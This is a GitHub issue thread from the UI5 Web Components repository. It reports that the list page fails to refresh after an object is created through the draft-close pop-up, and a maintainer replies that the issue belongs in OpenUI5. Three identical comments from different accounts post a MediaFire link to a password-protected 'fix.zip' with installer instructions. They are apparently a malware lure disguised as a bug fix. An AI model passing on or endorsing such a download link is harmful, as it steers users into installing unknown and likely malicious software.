### ISSUE TITLE
Listpage not refreshed on draft close > create Object flow 

### ISSUE THREAD

**Issue by suri882006** [SAP/ui5-webcomponents#9742]
### Bug Description

The normal flow of creating draft mode and then hitting the `Create` button in footer is creating new object and also refereshing the List page. 

However when in draft mode when we try to close the object and in the pop-up if we choose `Create - Create new object` and then click on `Ok` it is observed that list page is not refreshed with latest values.

### Affected Component

Drafts, EditFlow, CreateObject

### Expected Behaviour

When closing the object page in draft mode (in which object is not created yet) and when we choose the `Create` option in popup expectation is once the entitiy is saved it should also refresh the List page. Similar to normal flow of creating object using `Create` button in footer. 

Internally we also observed that it uses same code EditFflow.ts > saveDocument

### Steps to Reproduce

- Click on `Create` button List page
- Fill the necessary details in draft mode
- Now try to close the details object page. (close button on top right corner)
- Now a pop-up open asking 3 options - Choose `Create` option and click on `ok`
<img width="1712" alt="Draft-close-Create-object-pop-up" src="https://github.com/user-attachments/assets/0c45584a-29b4-49bd-a6e2-f22623c8bbea">
- The entity is created in backend successfully, but observe that the list page is not refreshed with updated values. Have to manually click on `Go` to view the refreshed values.

### Priority

Medium

### UI5 Web Components Version

1.125.1

### Browser

Chrome

### Operating System

macOS Sonoma

### Organization

SAP GLO LOG

### Declaration

- [X] I’m not disclosing any internal or sensitive information.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by elenastoyanovaa** [comment]
Hello @suri882006 ,

Are you sure that you are using UI5 Web Components? The components mentioned are not part of the list of available UI5 Web Components components.
The issue is reported for version 1.125.1, which is not a version available in the UI5 Web Components project.

Did you meant to raise an issue for OPENUI5? If yes the issue should be raised here https://github.com/SAP/openui5/ 

Kind Regards,
Elena
